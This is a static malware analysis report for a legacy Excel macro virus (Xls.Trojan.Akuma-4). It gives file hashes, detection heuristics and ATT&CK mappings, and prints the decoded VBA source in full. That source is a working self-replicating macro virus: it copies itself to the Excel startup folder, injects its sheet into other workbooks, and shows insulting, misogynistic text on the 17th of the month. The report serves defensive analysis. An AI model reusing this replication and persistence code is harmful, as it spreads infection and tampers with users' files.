Xls.Trojan.Akuma-4 — Office (OLE) malware analysis

Static analysis result for SHA-256 802b7048f4d71b80…

MALICIOUS

Office (OLE)

269.0 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: ed233d6b6a6c33ac94f75717eedc28f0 SHA-1: 97514399f2989551a12bcc3956ce39c72e9927e1 SHA-256: 802b7048f4d71b80000798a493bbb2af4fc46e011ee4b2cc6c2149f1d330558f
280 Risk Score

Malware Insights

Xls.Trojan.Akuma-4 · confidence 95%

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

This Excel 5 macro virus, identified as Xls.Trojan.Akuma-4 by ClamAV, utilizes an Auto_Open macro to execute its payload. The script attempts to save a copy of itself as 'Akuma.XLS' in the startup path, potentially for persistence or further execution. The presence of the 'SE_PASSWORD_ARCHIVE_LURE' heuristic indicates a common tactic of instructing users to decrypt or open a password-protected archive, which is often used to bypass gateway security.

Heuristics 5

  • ClamAV: Xls.Trojan.Akuma-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Akuma-4
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2783 bytes
SHA-256: 588c499c68ac9a9d399df619cd09e1eeb30a2643be23c25e3c675f80ee5a5fb7
Detection
ClamAV: Xls.Trojan.Akuma-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Akuma"

Private Sub Auto_Open()
    With Application
        .DisplayRecentFiles = True
        .SheetsInNewWorkbook = 128
    End With
    Application.OnSheetActivate = "Akuma.Akuma"
End Sub

Private Sub Akuma()
    e = False
    m = False
    If Dir(Application.StartupPath & "\" & "Akuma.XLS") = "Akuma.XLS" Then e = True
    For c = 1 To ActiveWorkbook.Sheets.Count
        If ActiveWorkbook.Sheets(c).Name = "Akuma" Then m = True: Exit For
    Next c
    If e = False Then AkumaExcel
    If m = False Then AkumaModule
    Application.OnSheetActivate = "Akuma.xls!Akuma.Akuma"
    If Day(Date) = 17 Then AkumaDestroy
End Sub

Private Sub AkumaExcel()
    On Error GoTo OutExcel
    Application.ScreenUpdating = False
    actn$ = ActiveWorkbook.Name
    Workbooks(actn$).Sheets("Akuma").Copy
    nn$ = ActiveWorkbook.Name
    cdir$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(nn$).SaveAs FileName:=Application.StartupPath & "/" & "Akuma.XLS", FileFormat:=xlNormal, Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
    ChDir cdir$
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "Akuma.xls!Akuma.Akuma"
OutExcel:
    On Error GoTo 0
End Sub

Private Sub AkumaModule()
    On Error GoTo OutModule
    Application.ScreenUpdating = False
    actn$ = ActiveWorkbook.Name
    Workbooks("Akuma.xls").Sheets("Akuma").Copy before:=Workbooks(actn$).Sheets(1)
    Workbooks(actn$).Save
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "Akuma.xls!Akuma.Akuma"
OutModule:
    On Error GoTo 0
End Sub

Private Sub AkumaDestroy()
    If Dir("c:\mary.log", vbArchive + vbHidden + vbReadOnly) = "" Then
        For c = 1 To ActiveWorkbook.Sheets.Count
            If ActiveWorkbook.Sheets(c).Name <> "Akuma" Then copier = c: Exit For
        Next c
        ActiveWorkbook.Sheets(copier).Select
        ActiveWorkbook.Sheets(copier).Visible = True
        Cells(1, 1) = "Something wonderful has happened, your PC is alive and even better but some of your documents are infected by the Akuma virus."
        Cells(2, 1) = "Minny is simply a bitch and you, " + Application.UserName + ", are a stupid jerk."
        Cells(3, 1) = "Have a nice day."
        ActiveWorkbook.Sheets(copier).Visible = False
    Else
        MsgBox "Something wonderful has happened, your PC is alive and even better but some of your documents are infected by the Akuma virus." + Chr$(10) + "Minny is simply a bitch and you, " + Application.UserName + ", are a stupid jerk." + Chr$(10) + "Have a nice day."
    End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.